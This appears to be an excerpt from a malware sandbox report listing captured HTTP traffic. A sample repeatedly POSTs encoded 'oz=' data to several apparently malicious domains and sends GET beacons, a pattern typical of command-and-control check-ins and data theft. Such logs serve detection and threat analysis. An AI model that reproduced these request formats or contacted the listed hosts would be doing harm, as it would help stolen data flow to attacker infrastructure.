        Source: global trafficHTTP traffic detected: POST /qo4k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoOrigin: http://www.platinumkitchens.infoReferer: http://www.platinumkitchens.info/qo4k/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 32 59 4e 77 58 76 36 65 31 31 38 46 70 57 37 2f 36 56 62 6c 67 6a 38 56 68 54 37 6a 36 47 6f 52 32 76 70 63 41 4d 50 75 73 34 46 68 6d 41 62 73 4e 57 49 5a 68 48 65 70 42 55 74 55 76 56 63 7a 6b 34 41 68 74 33 38 2f 4d 6b 72 48 48 7a 45 44 37 42 50 66 6f 65 33 4c 39 75 30 38 2b 77 4d 71 74 4b 6c 34 56 33 46 34 76 76 6f 61 31 68 52 56 7a 70 4d 4b 51 42 6f 6c 73 42 50 57 76 74 5a 2b 77 54 6a 39 56 75 7a 34 4e 51 41 4b 58 44 7a 7a 4d 49 4e 63 4b 4d 6f 50 53 57 47 52 4e 71 77 2b 6a 4f 44 36 68 6c 77 6a 54 56 69 33 58 50 63 4b 4c 39 31 4e 79 66 4e 53 6a 5a 35 2b 42 6f 63 35 5a 59 6c 69 37 53 6b 76 36 70 63 3d Data Ascii: oz=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GoR2vpcAMPus4FhmAbsNWIZhHepBUtUvVczk4Aht38/MkrHHzED7BPfoe3L9u08+wMqtKl4V3F4vvoa1hRVzpMKQBolsBPWvtZ+wTj9Vuz4NQAKXDzzMINcKMoPSWGRNqw+jOD6hlwjTVi3XPcKL91NyfNSjZ5+Boc5ZYli7Skv6pc=
        Source: global trafficHTTP traffic detected: POST /qo4k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoOrigin: http://www.platinumkitchens.infoReferer: http://www.platinumkitchens.info/qo4k/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 32 59 4e 77 58 76 36 65 31 31 38 46 70 57 37 2f 36 56 62 6c 67 6a 38 56 68 54 37 6a 36 47 77 52 32 2b 4a 63 42 76 6e 75 74 34 46 68 70 51 62 74 4e 57 49 41 68 48 47 6c 42 55 68 45 76 58 55 7a 6c 61 34 68 36 57 38 2f 58 30 72 48 61 44 45 41 30 68 4f 48 6f 65 6e 48 39 71 55 38 2b 77 4d 71 74 4a 39 34 42 32 46 34 38 2f 6f 5a 79 68 52 6e 6b 35 4e 74 51 42 41 66 73 42 43 72 6f 63 6c 2b 31 41 62 39 47 6f 66 34 43 51 41 79 57 44 7a 72 4d 49 41 47 4b 4e 45 44 53 58 69 37 4e 74 55 2b 67 2f 79 79 34 57 38 6c 41 57 6d 6c 65 2b 6b 39 46 66 78 30 73 2f 46 54 76 4a 6c 43 4d 74 77 4a 53 70 56 50 69 69 78 76 6c 76 31 30 47 58 50 55 61 58 6f 50 77 48 6a 55 4a 50 35 32 71 65 59 5a 78 7a 55 45 30 50 2b 4f 59 59 69 61 63 49 67 72 57 6c 68 71 48 49 5a 77 52 55 79 4b 35 46 66 76 65 39 50 65 4d 48 51 51 67 79 44 4e 6c 44 46 4b 43 64 6c 6d 73 79 46 4b 6d 51 39 38 51 53 6d 64 63 67 43 63 6d 6a 32 6f 35 71 47 66 67 55 37 4b 47 78 6f 77 51 69 70 56 35 32 68 73 2f 36 58 41 6a 56 54 34 76 33 2b 56 79 6a 49 31 75 74 4e 49 33 7a 6b 2f 4e 71 4c 43 77 69 34 41 4a 76 44 65 57 52 77 72 7a 75 64 44 58 32 69 6a 4f 74 67 4c 6e 65 4d 44 77 67 73 72 53 33 64 78 43 79 45 6b 72 37 73 65 37 6a 76 49 4a 57 67 45 72 6d 52 31 37 6e 69 32 76 58 51 6e 6f 52 77 6f 50 4f 62 46 36 68 4c 47 39 45 34 42 58 50 33 53 2b 48 56 53 75 64 33 64 64 6d 66 4a 53 38 6e 45 67 6a 53 4f 2f 2b 2f 71 4e 6f 77 70 38 45 4e 74 6f 43 4c 4d 64 55 53 62 77 46 41 74 4f 44 2f 37 68 52 54 52 6a 6e 56 72 34 56 6c 41 46 7a 36 4b 44 46 65 33 47 37 42 37 52 68 30 4f 6c 62 76 4d 39 38 38 47 7a 4a 71 30 61 76 68 57 67 57 65 55 36 70 65 45 72 2b 49 4b 39 70 43 6e 51 43 62 7a 2f 53 65 73 35 54 6a 31 79 35 38 6a 4f 75 62 73 71 6d 5a 69 32 32 56 32 4e 4a 38 5a 66 66 51 30 78 65 43 2b 55 49 46 4f 48 64 35 74 5a 36 6b 53 38 4e 65 45 45 41 54 56 4a 5a 61 39 73 62 2f 61 53 39 53 69 49 51 46 47 32 57 4c 5a 38 6e 6a 6b 5a 62 41 44 61 44 76 58 55 38 56 44 4f 68 56 41 73 57 Data Ascii: oz=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GwR2+JcBvnut4FhpQbtNWIAhHGlBUhEvXUzla4h6W8/X0rHaDEA0hOHoenH9qU8+wMqtJ94B2F48/oZyhRnk5NtQBAfsBCrocl+1Ab9Gof4CQAyWDzrMIAGKNEDSXi7NtU+g/yy4W8lAWmle+k9Ffx0s/FTvJlCMtwJSpVPiixvlv10GXPUaXoPwHjUJP52qeYZxzUE0P+OYYiacIgrWlhqHIZwRUyK5Ffve9PeMHQQgyDNlDFKCdlmsyFKmQ98QSmdcgCcmj2o5qGfgU7KGxowQipV52hs/6XAjVT4v3+VyjI1utNI3zk/NqLCwi4AJvDeWRwrzudDX2ijOtgL
        Source: global trafficHTTP traffic detected: GET /qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /yyvd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dhkatp.vipOrigin: http://www.dhkatp.vipReferer: http://www.dhkatp.vip/yyvd/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 48 79 55 37 66 42 2f 7a 69 47 4a 51 37 75 64 58 38 2b 6b 63 38 6e 4a 79 32 4c 62 37 33 33 74 6f 37 70 55 70 32 39 31 5a 6d 43 49 43 6c 36 75 45 4b 61 42 71 64 47 79 62 59 33 73 65 4a 67 79 66 57 48 70 6a 39 35 6c 58 4e 62 39 77 2b 66 6c 36 44 7a 4e 4b 66 38 6b 66 68 67 59 43 66 46 5a 61 47 79 31 68 61 53 41 33 6b 74 61 68 6f 2f 79 34 34 4b 43 59 6b 47 41 4a 31 53 30 63 73 38 48 6b 54 6c 4f 4c 58 71 53 44 33 2b 54 44 74 61 55 66 74 79 53 64 79 30 73 6b 2b 54 66 48 48 62 50 71 39 79 75 2f 4c 71 69 4d 59 7a 6c 57 61 68 31 34 6a 35 54 6a 34 77 3d 3d Data Ascii: oz=Ao0pCCEh0VO3HyU7fB/ziGJQ7udX8+kc8nJy2Lb733to7pUp291ZmCICl6uEKaBqdGybY3seJgyfWHpj95lXNb9w+fl6DzNKf8kfhgYCfFZaGy1haSA3ktaho/y44KCYkGAJ1S0cs8HkTlOLXqSD3+TDtaUftySdy0sk+TfHHbPq9yu/LqiMYzlWah14j5Tj4w==
        Source: global trafficHTTP traffic detected: POST /yyvd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dhkatp.vipOrigin: http://www.dhkatp.vipReferer: http://www.dhkatp.vip/yyvd/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 47 53 6b 37 50 53 6e 7a 6c 6d 4a 66 2b 75 64 58 33 65 6b 59 38 6e 46 79 32 50 4b 32 33 45 4a 6f 37 4a 6b 70 78 4d 31 5a 71 69 49 43 74 61 75 59 48 36 42 39 64 47 33 6b 59 79 4d 65 4a 6b 69 66 57 43 56 6a 39 76 74 55 4d 4c 39 75 31 2f 6c 43 65 44 4e 4b 66 38 6b 66 68 67 4d 6b 66 46 42 61 48 44 6c 68 62 32 30 30 6e 74 61 69 70 2f 79 34 70 61 44 77 6b 47 41 6e 31 54 6f 6d 73 36 44 6b 54 67 4b 4c 57 37 53 43 67 75 53 49 67 36 56 61 72 68 76 6a 70 42 78 53 34 55 76 4a 43 4a 36 57 78 45 2f 6c 57 59 57 6f 62 67 35 6b 65 52 4d 51 68 37 53 34 6c 7a 66 71 7a 48 36 49 45 75 57 4a 44 72 73 6c 71 74 58 66 6d 35 77 3d Data Ascii: oz=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EJo7JkpxM1ZqiICtauYH6B9dG3kYyMeJkifWCVj9vtUML9u1/lCeDNKf8kfhgMkfFBaHDlhb200ntaip/y4paDwkGAn1Toms6DkTgKLW7SCguSIg6VarhvjpBxS4UvJCJ6WxE/lWYWobg5keRMQh7S4lzfqzH6IEuWJDrslqtXfm5w=
        Source: global trafficHTTP traffic detected: POST /yyvd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dhkatp.vipOrigin: http://www.dhkatp.vipReferer: http://www.dhkatp.vip/yyvd/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 47 53 6b 37 50 53 6e 7a 6c 6d 4a 66 2b 75 64 58 33 65 6b 59 38 6e 46 79 32 50 4b 32 33 45 42 6f 36 36 73 70 32 66 4e 5a 72 69 49 43 6e 36 75 62 48 36 41 2f 64 48 54 67 59 79 49 4f 4a 69 2b 66 45 77 4e 6a 70 4b 4e 55 48 4c 39 75 6f 76 6c 35 44 7a 4e 54 66 38 30 62 68 67 63 6b 66 46 42 61 48 42 4e 68 59 69 41 30 68 74 61 68 6f 2f 7a 33 34 4b 44 4c 6b 47 49 52 31 54 64 62 74 4c 2f 6b 53 41 61 4c 61 70 36 43 2f 65 53 4b 6c 36 56 38 72 68 6a 47 70 41 59 74 34 55 79 55 43 4f 47 57 37 43 47 39 52 70 71 55 59 53 77 75 43 52 42 6f 74 36 71 6f 6e 52 2f 56 2b 57 79 66 4f 5a 47 64 4b 59 4d 6c 76 4f 33 30 37 39 49 77 38 61 42 4b 6f 75 51 2b 4e 78 53 53 76 37 6f 4e 47 74 64 59 62 34 43 46 79 38 47 63 55 66 2b 6c 67 64 5a 37 45 73 2f 51 66 43 6a 6e 46 7a 70 45 36 7a 6d 57 4a 43 7a 53 34 4c 41 6a 57 6b 56 4c 5a 68 73 2f 4e 30 63 36 76 46 53 39 73 5a 69 54 33 58 71 31 76 42 61 78 57 72 50 2b 5a 38 47 4d 34 75 78 63 4b 41 36 52 49 41 68 4c 6a 65 34 56 52 58 41 4f 34 44 39 6b 57 54 50 42 52 30 37 2f 42 56 65 62 69 31 69 55 55 62 6e 59 68 38 78 77 59 6e 42 72 41 67 63 32 57 57 48 63 66 4e 63 55 41 33 58 2f 77 4a 5a 74 32 76 63 41 41 46 48 4e 45 47 65 66 2f 6b 2b 6b 44 6e 58 39 47 54 36 6c 70 70 71 66 69 59 66 47 64 69 37 30 4e 63 77 58 59 38 44 65 64 6b 41 55 2b 69 35 71 55 55 72 57 41 79 61 4c 49 77 4a 73 6a 67 61 6b 5a 69 6a 79 37 31 78 38 42 73 71 69 46 43 45 68 75 6c 33 50 4f 72 39 4f 42 44 43 62 61 72 76 69 64 76 68 56 6e 57 62 54 58 30 78 61 64 45 75 48 61 39 77 43 50 70 62 4f 35 66 4a 42 6c 69 79 63 76 6b 7a 33 42 63 5a 5a 74 44 56 67 79 59 32 2b 35 49 71 68 7a 57 6c 46 51 37 53 38 53 68 6c 4e 72 6f 74 76 37 50 33 62 61 7a 67 6e 39 5a 32 4a 45 7a 34 70 5a 51 39 4a 46 61 75 38 43 6f 7a 67 6d 33 6b 66 71 55 53 79 51 71 59 55 4a 68 38 53 6a 6f 5a 43 55 5a 62 46 55 68 78 39 63 41 69 6c 45 6d 38 51 53 39 76 6d 5a 41 50 45 66 56 68 4a 55 61 79 31 6e 45 44 6e 32 59 67 73 54 4c 34 74 7a 37 49 33 72 51 62 2b 69 76 62 4d 79 72 73 37 49 76 72 5a 2f 41 61 2b 43 48 66 71 78 76 6c 61 42 6c 4a 50 45 61 52 Data Ascii: oz=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EBo66sp2fNZriICn6ubH6A/dHTgYyIOJi+fEwNjpKNUHL9uovl5DzNTf80bhgckfFBaHBNhYiA0htaho/z34KDLkGIR1TdbtL/kSAaLap6C/eSKl6V8rhjGpAYt4UyUCOGW7CG9RpqUYSwuCRBot6qonR/V+WyfOZGdKYMlvO3079Iw8aBKouQ+NxSSv7oNGtdYb4CFy8GcUf+lgdZ7Es/QfCjnFzpE6zmWJCzS4LAjWkVLZhs/N0c6vFS9sZiT3Xq1vBaxWrP+Z8GM4u
        Source: global trafficHTTP traffic detected: GET /yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /iydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickOrigin: http://www.tempatmudisini01.clickReferer: http://www.tempatmudisini01.click/iydt/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 72 43 4e 57 52 41 61 72 77 58 48 74 44 34 6b 6d 50 4f 51 31 68 35 4d 75 65 55 79 67 36 30 49 43 50 4f 37 30 69 56 6f 57 43 49 74 45 74 75 38 49 69 56 70 36 41 79 74 32 77 2f 66 4d 77 4e 4f 2b 34 34 73 35 4b 63 72 73 4d 6f 5a 78 45 74 6a 50 4c 35 55 6c 59 4f 42 4a 42 79 6c 4e 75 72 67 52 30 6a 6e 34 7a 6d 42 6d 75 32 50 52 6a 64 36 63 68 38 30 36 76 52 4b 79 64 6e 62 31 50 41 59 57 5a 73 47 77 53 61 5a 71 4e 45 59 4a 7a 58 75 41 68 7a 4b 42 47 37 51 30 64 4f 2f 6d 31 57 4f 58 4e 47 57 43 75 38 46 6c 6a 50 6f 44 6c 51 56 70 5a 42 36 33 66 67 3d 3d Data Ascii: oz=OcHLqbGcDYEKrCNWRAarwXHtD4kmPOQ1h5MueUyg60ICPO70iVoWCItEtu8IiVp6Ayt2w/fMwNO+44s5KcrsMoZxEtjPL5UlYOBJBylNurgR0jn4zmBmu2PRjd6ch806vRKydnb1PAYWZsGwSaZqNEYJzXuAhzKBG7Q0dO/m1WOXNGWCu8FljPoDlQVpZB63fg==
        Source: global trafficHTTP traffic detected: POST /iydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickOrigin: http://www.tempatmudisini01.clickReferer: http://www.tempatmudisini01.click/iydt/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 71 68 46 57 53 68 61 72 32 33 48 75 41 34 6b 6d 56 2b 51 35 68 35 51 75 65 56 6d 4f 36 41 6b 43 4b 66 4c 30 6a 52 63 57 42 49 74 45 35 2b 39 43 73 31 70 68 41 79 78 55 77 36 33 4d 77 4c 69 2b 34 39 51 35 4b 4e 72 72 50 59 5a 7a 50 4e 6a 4a 45 5a 55 6c 59 4f 42 4a 42 79 78 33 75 72 34 52 30 7a 33 34 79 43 64 6c 79 6d 50 4f 69 64 36 63 6c 38 30 32 76 52 4b 63 64 6c 76 50 50 46 63 57 5a 74 32 77 53 49 39 72 44 45 59 44 33 58 76 52 77 77 62 6a 4a 2f 35 44 5a 70 69 68 73 46 47 67 46 77 48 59 7a 4f 78 42 67 63 30 78 68 67 73 42 62 44 37 73 43 67 42 6a 69 63 35 46 51 64 33 52 62 6a 4c 31 75 56 2b 58 4c 34 38 3d Data Ascii: oz=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6AkCKfL0jRcWBItE5+9Cs1phAyxUw63MwLi+49Q5KNrrPYZzPNjJEZUlYOBJByx3ur4R0z34yCdlymPOid6cl802vRKcdlvPPFcWZt2wSI9rDEYD3XvRwwbjJ/5DZpihsFGgFwHYzOxBgc0xhgsBbD7sCgBjic5FQd3RbjL1uV+XL48=
        Source: global trafficHTTP traffic detected: POST /iydt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickOrigin: http://www.tempatmudisini01.clickReferer: http://www.tempatmudisini01.click/iydt/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 71 68 46 57 53 68 61 72 32 33 48 75 41 34 6b 6d 56 2b 51 35 68 35 51 75 65 56 6d 4f 36 42 77 43 4b 4e 44 30 69 32 41 57 41 49 74 45 6d 4f 39 42 73 31 6f 68 41 79 70 51 77 36 7a 32 77 49 57 2b 37 66 6f 35 62 4a 33 72 59 6f 5a 7a 41 74 6a 49 4c 35 56 39 59 4f 52 4e 42 79 68 33 75 72 34 52 30 31 62 34 37 32 42 6c 77 6d 50 52 6a 64 36 51 68 38 30 61 76 51 69 71 64 6c 72 6c 50 32 6b 57 5a 4e 6d 77 55 37 5a 72 63 30 59 46 77 58 76 4a 77 77 58 56 4a 37 59 36 5a 74 6a 70 73 47 32 67 41 48 4b 53 32 50 56 46 38 74 49 79 68 43 4d 58 66 43 72 46 44 77 39 45 68 39 74 54 53 5a 7a 68 63 7a 4c 35 38 6c 65 49 53 6f 35 50 62 6c 53 43 46 63 59 64 69 6d 51 6a 34 6f 71 6e 50 44 54 77 59 4d 36 61 39 50 34 4d 4d 66 45 47 44 73 35 42 4f 5a 56 62 46 36 62 43 51 66 4b 2b 78 2f 34 4e 4c 49 5a 77 62 79 61 4b 47 76 4c 47 41 57 2f 49 69 64 43 37 59 6b 61 35 45 64 44 43 52 74 49 71 38 6b 75 52 6d 56 35 53 33 4c 36 64 50 62 6b 4b 77 38 75 69 31 48 34 61 76 58 57 61 4c 63 50 4b 65 34 32 64 78 6b 4b 76 37 47 6b 42 53 35 34 5a 5a 47 46 44 6d 55 55 6c 38 70 6d 59 6e 6b 5a 74 76 56 76 72 7a 59 32 53 51 5a 31 44 31 75 49 56 55 69 63 78 6d 52 37 6b 66 39 76 45 34 54 56 75 56 62 30 47 37 77 59 42 50 54 6d 53 76 2b 35 66 53 57 4a 55 78 54 32 34 4a 72 37 69 70 2b 48 69 2f 4c 2f 75 71 4b 42 2f 62 38 38 65 31 37 73 38 35 53 54 4c 35 7a 2f 31 31 43 2b 77 57 58 4a 63 65 67 51 58 43 48 4f 77 6b 64 70 41 50 5a 73 50 34 77 69 69 58 63 37 51 77 4e 4d 4c 44 48 43 64 66 64 77 6c 46 2f 6a 70 33 4c 75 75 56 45 54 56 69 79 41 78 36 74 73 72 48 49 37 44 50 31 6f 49 65 37 67 50 56 7a 63 4e 59 79 4e 6a 71 6a 48 45 4b 46 35 73 38 30 31 6a 43 57 6c 34 6f 74 74 51 67 4f 39 69 53 2b 4d 6c 58 47 6c 75 47 7a 43 64 32 6a 34 65 77 4e 49 47 69 39 42 51 4e 4e 34 78 64 64 6f 56 45 71 4a 62 35 6f 64 50 64 74 56 32 6c 56 37 37 75 36 44 67 4f 78 39 50 37 4a 6c 6c 58 61 6e 4e 4a 52 35 55 49 32 42 62 64 75 5a 30 43 45 33 34 54 36 61 79 46 73 45 Data Ascii: oz=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6BwCKND0i2AWAItEmO9Bs1ohAypQw6z2wIW+7fo5bJ3rYoZzAtjIL5V9YORNByh3ur4R01b472BlwmPRjd6Qh80avQiqdlrlP2kWZNmwU7Zrc0YFwXvJwwXVJ7Y6ZtjpsG2gAHKS2PVF8tIyhCMXfCrFDw9Eh9tTSZzhczL58leISo5PblSCFcYdimQj4oqnPDTwYM6a9P4MMfEGDs5BOZVbF6bCQfK+x/4NLIZwbyaKGvLGAW/IidC7Yka5EdDCRtIq8kuRmV5S3L6dPbkKw8ui1H4avXWaLcPKe42dxkKv7GkBS54ZZGFDmUUl8pmYnkZtvVvrzY2SQZ1D1uIVUicxmR
        Source: global trafficHTTP traffic detected: GET /iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qwk1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.komart.shopOrigin: http://www.komart.shopReferer: http://www.komart.shop/qwk1/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 78 61 36 66 6a 41 73 52 38 30 6f 73 79 6c 7a 65 64 74 68 6e 70 35 62 34 32 79 72 51 73 4b 41 6d 34 61 37 6b 75 76 4a 74 41 67 54 77 5a 31 55 38 54 64 55 6d 2f 58 74 35 76 4c 4f 66 62 59 55 44 35 65 74 41 4b 34 42 4e 6b 45 42 48 6e 65 31 5a 56 74 73 30 54 41 5a 47 76 56 51 48 49 71 52 49 2f 4c 32 63 79 42 4a 4f 35 42 64 42 75 65 58 52 44 39 58 66 6e 71 76 6a 54 74 6d 65 36 72 65 4b 53 72 70 68 2f 74 31 66 48 36 54 38 61 59 6d 2b 6e 57 66 65 54 36 75 73 2f 6b 53 31 59 79 62 41 2b 6f 30 67 55 51 57 70 4f 32 72 43 69 71 62 6c 30 44 6e 49 77 3d 3d Data Ascii: oz=+s6bZXAYHnamcxa6fjAsR80osylzedthnp5b42yrQsKAm4a7kuvJtAgTwZ1U8TdUm/Xt5vLOfbYUD5etAK4BNkEBHne1ZVts0TAZGvVQHIqRI/L2cyBJO5BdBueXRD9XfnqvjTtme6reKSrph/t1fH6T8aYm+nWfeT6us/kS1YybA+o0gUQWpO2rCiqbl0DnIw==
        Source: global trafficHTTP traffic detected: POST /qwk1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.komart.shopOrigin: http://www.komart.shopReferer: http://www.komart.shop/qwk1/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 51 4b 36 51 67 6f 73 57 63 30 72 31 43 6c 7a 48 74 73 6d 6e 75 78 62 34 79 71 37 52 65 75 41 6d 64 2b 37 6c 71 44 4a 71 41 67 54 34 35 31 64 6a 44 63 35 6d 2f 61 4e 35 71 72 4f 66 62 4d 55 44 34 75 74 42 38 77 47 4d 30 45 48 4c 48 65 37 64 56 74 73 30 54 41 5a 47 73 70 70 48 49 79 52 49 71 44 32 64 51 70 4b 56 5a 42 53 43 75 65 58 56 44 39 54 66 6e 72 4b 6a 53 77 44 65 34 6a 65 4b 54 62 70 6d 72 42 36 51 48 36 76 6a 4b 5a 58 76 30 33 49 53 67 37 54 6a 39 46 50 7a 37 43 47 42 6f 35 75 39 6d 6b 79 71 64 71 5a 47 53 54 7a 6e 32 43 38 56 33 35 76 70 77 77 42 70 79 4e 77 36 58 48 6d 37 39 57 78 46 44 4d 3d Data Ascii: oz=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7ReuAmd+7lqDJqAgT451djDc5m/aN5qrOfbMUD4utB8wGM0EHLHe7dVts0TAZGsppHIyRIqD2dQpKVZBSCueXVD9TfnrKjSwDe4jeKTbpmrB6QH6vjKZXv03ISg7Tj9FPz7CGBo5u9mkyqdqZGSTzn2C8V35vpwwBpyNw6XHm79WxFDM=
